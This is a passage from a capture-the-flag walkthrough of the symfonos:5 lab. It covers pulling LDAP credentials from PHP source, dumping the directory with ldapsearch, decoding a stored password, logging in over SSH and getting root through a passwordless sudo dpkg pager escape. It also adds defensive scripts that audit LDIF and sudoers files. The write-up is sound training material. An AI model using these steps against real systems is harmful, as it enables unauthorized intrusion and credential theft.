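                   + "\n</body></html>")


if __name__ == "__main__":
    source = extract_source(SAMPLE_RESPONSE)      # or: fetch_source("admin.php")
    for dn, password in find_ldap_credentials(source):
        print(f"bind DN: {dn}\npassword: {password}")
```

Against the live target, fetch_source("admin.php") replaces the curl-and-text-editor round trip, and the same function works for any file the web server user can read, so it is worth running over every .php name dirb reported.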


Enumerate LDAP service to retrieve sensitive information

To enumerate LDAP, the retrieved credentials will be used to perform queries and identify critical information within the directory structure. This process can uncover valuable details such as user accounts, groups, or configurations that could aid in further exploitation.

The tool used for this task is ldapsearch , a command-line utility for querying and retrieving data from an LDAP (Lightweight Directory Access Protocol) server. Its flexible syntax supports parameters for authentication, base DN, filters, and attributes.

To begin, run the following command:

┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H ldap://192.168.103.17 -D "cn=admin,dc=symfonos,dc=local" -w qMDdyZh3cT6eeAWD -b "dc=symfonos,dc=local"
Where:

  • -x enables simple (password) authentication instead of SASL,
  • -H specifies the LDAP URI,
  • -D gives the bind DN (Distinguished Name), here the administrator's account,
  • -w supplies the bind password on the command line (use -W instead to be prompted, which keeps the password out of shell history and the process list), and
  • -b sets the base DN, the starting point of the search (subtree scope by default).

# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The search returns three entries: the base (dc=symfonos,dc=local), the admin entry, and a user entry for zeus. Both the admin and zeus entries carry a userPassword attribute printed with a double colon (::). That is LDIF's way of saying the value is Base64-encoded, which ldapsearch does for every userPassword because the attribute has binary syntax. Base64 is an encoding, not encryption: what the decoded value looks like depends entirely on how the password was stored.

Attributes for the zeus entry include:

  • uid (user ID): zeus
  • cn (common name): zeus
  • loginShell: /bin/bash (a Unix/Linux login account)
  • homeDirectory: /home/zeus
  • userPassword (Base64-encoded in the LDIF): Y2V0a0tmNHdDdUhDOUZFVA==

Decode the zeus value with the following command.

┌──(kali㉿kali)-[~]
└─$ echo 'Y2V0a0tmNHdDdUhDOUZFVA==' | base64 -d
cetkKf4wCuHC9FET                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 
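The difference between the two userPassword values above is the security-relevant point: the LDIF double colon only means "base64-encoded", and what comes out may be a hash (admin) or a cleartext password (zeus). The following Python script is an added example, not part of the walkthrough or of OpenLDAP: it parses an LDIF export the way ldapsearch prints it, decodes the double-colon values, and reports which entries store passwords in cleartext, which is the finding a directory administrator would want to act on. SAMPLE_LDIF is a trimmed copy of the output shown above; the parser and the audit function are assumptions about how such a check would be written, not ldapsearch features.

```python
"""Audit userPassword values in an LDIF export for cleartext storage.

Added example, not from the walkthrough or from OpenLDAP. SAMPLE_LDIF is a
trimmed copy of the ldapsearch output shown above (constructed sample);
parse_ldif/audit are an assumed defender-side check, not an ldapsearch feature.
"""
import base64
import re

# Constructed sample: abbreviated form of the page's ldapsearch output.
SAMPLE_LDIF = """\
# extended LDIF
# base <dc=symfonos,dc=local> with scope subtree
dn: dc=symfonos,dc=local
objectClass: top
dc: symfonos

dn: cn=admin,dc=symfonos,dc=local
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
"""

# RFC 2307 scheme prefixes: a value carrying one is a hash, anything else is cleartext.
HASH_SCHEME = re.compile(rb"^\{(SSHA|SHA|SSHA256|SSHA512|MD5|SMD5|CRYPT|PBKDF2[-A-Z0-9]*|ARGON2)\}", re.I)

# "attr: value" is plain text, "attr:: value" is base64 (RFC 2849)
ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?)\s?(.*)$")


def unfold(text):
    """Join LDIF folded lines: a line beginning with one space continues the previous one."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return one {attribute: [bytes, ...]} dict per entry, in file order.

    Values are always bytes: '::' values are base64-decoded, ': ' values are
    UTF-8 encoded, so callers do not have to care which form the server chose.
    """
    entries, current = [], {}
    for line in unfold(text) + [""]:          # trailing "" flushes the last entry
        if not line:
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):              # ldapsearch's own comment lines
            continue
        m = ATTR_RE.match(line)
        if not m:
            raise ValueError(f"malformed LDIF line: {line!r}")
        attr, sep, value = m.groups()
        raw = base64.b64decode(value) if sep == "::" else value.encode()
        current.setdefault(attr, []).append(raw)
    return entries


def classify_password(value):
    """'hashed' if the value carries an RFC 2307 scheme prefix, else 'cleartext'."""
    return "hashed" if HASH_SCHEME.match(value) else "cleartext"


def audit(text):
    """Map each DN that has a userPassword to how that password is stored.

    A cleartext finding is the one to act on: anyone who can read the entry
    gets a usable credential without any cracking, which is exactly what
    happened to zeus on this box.
    """
    findings = {}
    for entry in parse_ldif(text):
        dn = entry["dn"][0].decode()
        for value in entry.get("userPassword", []):
            findings[dn] = classify_password(value)
    return findings


if __name__ == "__main__":
    for dn, storage in audit(SAMPLE_LDIF).items():
        print(f"{storage:9s} {dn}")
```

Run against the sample, the script reports admin as hashed and zeus as cleartext. Pointing it at a real export (`ldapsearch ... > dump.ldif`, then `audit(open("dump.ldif").read())`) gives the same classification for every entry the bind account is allowed to read; the fix for a cleartext finding is to reset the password so slapd stores it under its configured hash scheme, and to review which bind DNs can read userPassword at all.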

We now have a valid username and password, so the next step is to use these credentials to attempt an SSH login to the target machine and gain a foothold on the system.


Foothold

Establish Connection via SSH

To gain an SSH connection, run ssh followed by the username zeus, an @ sign, and the target IP address.

┌──(kali㉿kali)-[~]
└─$ ssh zeus@192.168.103.17
The authenticity of host '192.168.103.17 (192.168.103.17)' can't be established.
ED25519 key fingerprint is SHA256:AUY0DS5ZQcOdGTwmyBVNdv+UiiIPJG+sZ6/6vIoVhq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.103.17' (ED25519) to the list of known hosts.
zeus@192.168.103.17's password: 

Now, specify the password.

zeus@192.168.103.17's password: 
Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb  5 06:14:43 2020 from 172.16.1.1
zeus@symfonos5:~$

The SSH login using the recovered credentials was successful, providing access to the remote system. On this first connection, the server's host key fingerprint was accepted and added to the known_hosts file.

zeus@symfonos5:~$ ls -al
total 24                                                                                                                                                  
drwxr-xr-x 3 zeus zeus 4096 Feb  5  2020 .                                                                                                                
drwxr-xr-x 3 root root 4096 Jan  3  2020 ..                                                                                                               
lrwxrwxrwx 1 root root    9 Jan  6  2020 .bash_history -> /dev/null                                                                                       
-rw-r--r-- 1 zeus zeus  220 Jan  3  2020 .bash_logout                                                                                                     
-rw-r--r-- 1 zeus zeus 3526 Jan  3  2020 .bashrc                                                                                                          
drwx------ 3 zeus zeus 4096 Jan  6  2020 .gnupg                                                                                                           
-rw-r--r-- 1 zeus zeus  807 Jan  3  2020 .profile                                                                                                         
zeus@symfonos5:~$ 

After gaining access, the user’s home directory was inspected for the user flag, but it was not present. With no user flag available, the next logical step is Privilege Escalation to obtain higher-level access and locate the root flag.


Privilege Escalation

In the privilege escalation process, the primary objective is to further enumerate the system to identify misconfigurations, exploitable vulnerabilities, or overlooked permissions that could enable escalation to root or another privileged user. This includes investigating file permissions , SUID files , running services , and scheduled tasks for potential exploitation opportunities.


Enumerating System Information

However, as we currently operate with limited user privileges through the SSH session, we face restrictions on accessing certain files or commands for a comprehensive assessment.

To move forward, we run the sudo -l command to determine whether the user zeus has any special sudo privileges.

zeus@symfonos5:~$ sudo -l                                                                                                                                 
Matching Defaults entries for zeus on symfonos5:                                                                                                          
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                                                
                                                                                                                                                          
User zeus may run the following commands on symfonos5:                                                                                                    
    (root) NOPASSWD: /usr/bin/dpkg                                                                                                                        
zeus@symfonos5:~$ 

The sudo -l output revealed that Zeus could execute the /usr/bin/dpkg command as root without requiring a password. This opens a path to escalate privileges and gain root access.


Local Privilege Escalation via Passwordless sudo on dpkg

To exploit this, dpkg is used to spawn a shell that inherits root privileges. sudo dpkg -l sends the package list through an interactive pager, and the pager's ! escape runs a command as the pager's owner, which under sudo is root; the resulting shell can read the whole file system and keeps privileged access.

The process involves:

Visiting the GTFOBins website, a repository of Unix binaries that can bypass standard security restrictions, to identify a suitable command for privilege escalation using dpkg.

GTFOBins - GTFO Binaries

Explore GTFOBins, a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. A valuable resource for penetration testers and security professionals.

Searching for dpkg on GTFOBins, which confirms that, when run via sudo, it can be made to spawn a shell with elevated privileges.

Running sudo dpkg -l and, at the pager prompt, typing !/bin/sh to open a root shell.

zeus@symfonos5:~$ sudo dpkg -l                                                                                                                            
Desired=Unknown/Install/Remove/Purge/Hold                                                                                                                 
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend                                                                            
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)                                                                                                
||/ Name                          Version                     Architecture Description                                                                    
+++-=============================-===========================-============-===============================================================================
ii  adduser                       3.118                       all          add and remove users and groups                                                
ii  ame                           1.0                         amd64        no description given                                                           
ii  apparmor                      2.13.2-10                   amd64        user-space parser utility for AppArmor
ii  apt                           1.8.2                       amd64        commandline package manager
ii  apt-listchanges               3.19                        all          package change history notification tool
ii  apt-transport-https           1.8.2                       all          transitional package for https support
ii  apt-utils                     1.8.2                       amd64        package management related utility programs
ii  aufs-dkms                     4.19+20190211-1             all          DKMS files to build and install aufs
ii  aufs-tools                    1:4.14+20190211-1           amd64        Tools to manage aufs filesystems
ii  base-files                    10.3+deb10u2                amd64        Debian base system miscellaneous files
ii  base-passwd                   3.5.46                      amd64        Debian base system master password and group files
ii  bash                          5.0-4                       amd64        GNU Bourne Again SHell
ii  bash-completion               1:2.8-6                     all          programmable completion for the bash shell
ii  bind9-host                    1:9.11.5.P4+dfsg-5.1        amd64        DNS lookup utility (deprecated)
ii  binutils                      2.31.1-16                   amd64        GNU assembler, linker and binary utilities
ii  binutils-common:amd64         2.31.1-16                   amd64        Common files for the GNU assembler, linker and binary utilities
ii  binutils-x86-64-linux-gnu     2.31.1-16                   amd64        GNU binary utilities, for x86-64-linux-gnu target
ii  bsdmainutils                  11.1.2+b1                   amd64        collection of more utilities from FreeBSD
ii  bsdutils                      1:2.33.1-0.1                amd64        basic utilities from 4.4BSD-Lite
ii  build-essential               12.6                        amd64        Informational list of build-essential packages
ii  busybox                       1:1.30.1-4                  amd64        Tiny utilities for small and embedded systems
ii  bzip2                         1.0.6-9.2~deb10u1           amd64        high-quality block-sorting file compressor - utilities
ii  ca-certificates               20190110                    all          Common CA certificates
ii  cgroupfs-mount                1.4                         all          Light-weight package to set up cgroupfs mounts
ii  console-setup                 1.193~deb10u1               all          console font and keymap setup program
ii  console-setup-linux           1.193~deb10u1               all          Linux specific part of console-setup
ii  containerd.io                 1.2.10-3                    amd64        An open and reliable container runtime
ii  coreutils                     8.30-3                      amd64        GNU core utilities
ii  cpio                          2.12+dfsg-9                 amd64        GNU cpio -- a program to manage archives of files
ii  cpp                           4:8.3.0-1                   amd64        GNU C preprocessor (cpp)

This successfully escalated privileges, switching the user to the root account.

# whoami
root                                                                                                                                                      
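The rule that made this possible is a single sudoers line, and it is the kind of thing a configuration audit should catch before an attacker does. The Python script below is an added, defender-side example, not part of the walkthrough or of the sudo project: it parses sudoers user specifications (tags, runas, comma-separated command lists) and flags passwordless root rules on commands that page their output, because the pager's shell escape turns such a rule into a root shell. SAMPLE_SUDOERS is constructed; only the zeus line reproduces what sudo -l reported above, and PAGER_SPAWNING is an assumed, deliberately short list.

```python
"""Audit sudoers user specs for passwordless root rules on pager-spawning commands.

Added example, not from the walkthrough or from the sudo project. SAMPLE_SUDOERS
is constructed; only the zeus line reproduces what `sudo -l` reported above.
PAGER_SPAWNING is an assumed, deliberately short list.
"""
import re

# Constructed sudoers fragment (not the real /etc/sudoers from the machine).
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# comment lines are ignored
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
zeus    ALL=(root) NOPASSWD: /usr/bin/dpkg
backup  ALL=(root) NOPASSWD: /usr/bin/rsync --dry-run -a /srv/ /mnt/backup/
deploy  ALL=(www-data) /usr/bin/systemctl restart app
"""

# Commands that hand long output to an interactive pager; the pager's `!` escape
# runs a shell as the pager's owner, so under passwordless sudo that is a root
# shell, as dpkg -l demonstrates on this box. Assumed, partial list.
PAGER_SPAWNING = {"/usr/bin/dpkg", "/usr/bin/man"}

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
        "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}

# user  host = (runas_user[:runas_group]) [TAG:] command, [TAG:] command ...
USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")


def parse_user_specs(text):
    """Return (user, host, runas_user, tags, command) tuples, one per command.

    Handles comments, Defaults lines, blank lines, comma-separated command
    lists and the TAG: prefix syntax, including sudo's rule that a tag stays
    in force for the rest of the list until its opposite (PASSWD/NOPASSWD,
    EXEC/NOEXEC, ...) overrides it. Alias definitions are skipped, not expanded.
    """
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        # runas defaults to root when no (...) is given; "(ALL:ALL)" -> "ALL"
        runas = ((m.group("runas") or "root").split(":")[0].strip()) or "root"
        tags = set()
        for chunk in m.group("rest").split(","):
            chunk = chunk.strip()
            while ":" in chunk and chunk.split(":", 1)[0].strip().upper() in TAGS:
                tag, chunk = chunk.split(":", 1)
                tag, chunk = tag.strip().upper(), chunk.strip()
                # each tag cancels its opposite: NOPASSWD <-> PASSWD, NOEXEC <-> EXEC, ...
                tags.discard(tag[2:] if tag.startswith("NO") else "NO" + tag)
                tags.add(tag)
            specs.append((m.group("user"), m.group("host"), runas, frozenset(tags), chunk))
    return specs


def find_risky_rules(text):
    """Flag rules that yield a root shell through a pager escape without a password."""
    findings = []
    for user, host, runas, tags, command in parse_user_specs(text):
        binary = command.split()[0]
        if "NOPASSWD" not in tags or runas not in ("root", "ALL"):
            continue
        if binary == "ALL":
            reason = "any command as root without a password"
        elif binary in PAGER_SPAWNING and "NOEXEC" not in tags:
            reason = f"{binary} pages its output; the pager's shell escape runs as root"
        else:
            continue
        findings.append({"user": user, "host": host, "command": command, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_risky_rules(SAMPLE_SUDOERS):
        print(f"{f['user']}@{f['host']}: {f['command']} -> {f['reason']}")
```

On the sample the only finding is the zeus rule. Restricting the arguments (for example to `/usr/bin/dpkg -l`) does not help, because the pager is still invoked; sudo's NOEXEC tag blocks the pager's child shell for dynamically linked binaries, which is why the script treats it as a mitigation, but it also stops dpkg from running its own helpers and maintainer scripts, so for a package manager the real fix is to drop the rule or replace it with a wrapper that writes the listing to a file instead of a pager.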

Navigating to the /root directory, the contents revealed a file named proof.txt, a common marker in CTF challenges and penetration tests to confirm successful exploitation.

# cd /root                                                                                                                                                
# ls -al                                                                                                                                                  
total 32                                                                                                                                                  
drwx------  4 root root 4096 Feb  5  2020 .                                                                                                               
drwxr-xr-x 19 root root 4096 Jan  6  2020 ..                                                                                                              
lrwxrwxrwx  1 root root    9 Jan  6  2020 .bash_history -> /dev/null                                                                                      
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc                                                                                                         
drwx------  3 root root 4096 Jan  6  2020 .gnupg                                                                                                          
drwxr-xr-x  3 root root 4096 Jan  4  2020 .local                                                                                                          
-rw-r--r--  1 root root  148 Aug 17  2015 .profile                                                                                                        
-rw-r--r--  1 root root 1209 Jan  6  2020 proof.txt                                                                                                       
-rw-r--r--  1 root root   66 Jan  6  2020 .selected_editor                                                                                                
# cat proof.txt                                                                                                                                           
                                                                                                                                                          
                    Congrats on rooting symfonos:5!                                                                                                       
                                                                                                                                                          
                                   ZEUS                                                                                                                   
              *      .            dZZZZZ,       .          *                                                                                              
                                 dZZZZ  ZZ,                                                                                                               
     *         .         ,AZZZZZZZZZZZ  `ZZ,_          *                                                                                                  
                    ,ZZZZZZV'      ZZZZ   `Z,`\
                  ,ZZZ    ZZ   .    ZZZZ   `V
        *      ZZZZV'     ZZ         ZZZZ    \_              .
.              V   l   .   ZZ        ZZZZZZ          .
               l    \       ZZ,     ZZZ  ZZZZZZ,
   .          /            ZZ l    ZZZ    ZZZ `Z,
                          ZZ  l   ZZZ     Z Z, `Z,            *
                .        ZZ      ZZZ      Z  Z, `l
                         Z        ZZ      V  `Z   \
                         V        ZZC     l   V
           Z             l        V ZR        l      .
            \             \       l  ZA
                            \         C          C
                                  \   K   /    /             K
                          A    \   \  |  /  /              /
                           \        \\|/ /  /
   __________________________________\|/_________________________
            Contact me via Twitter @zayotic to give feedback!

To view the root flag, the cat command was executed on the proof.txt file, verifying ownership of root privileges and completing the escalation process.

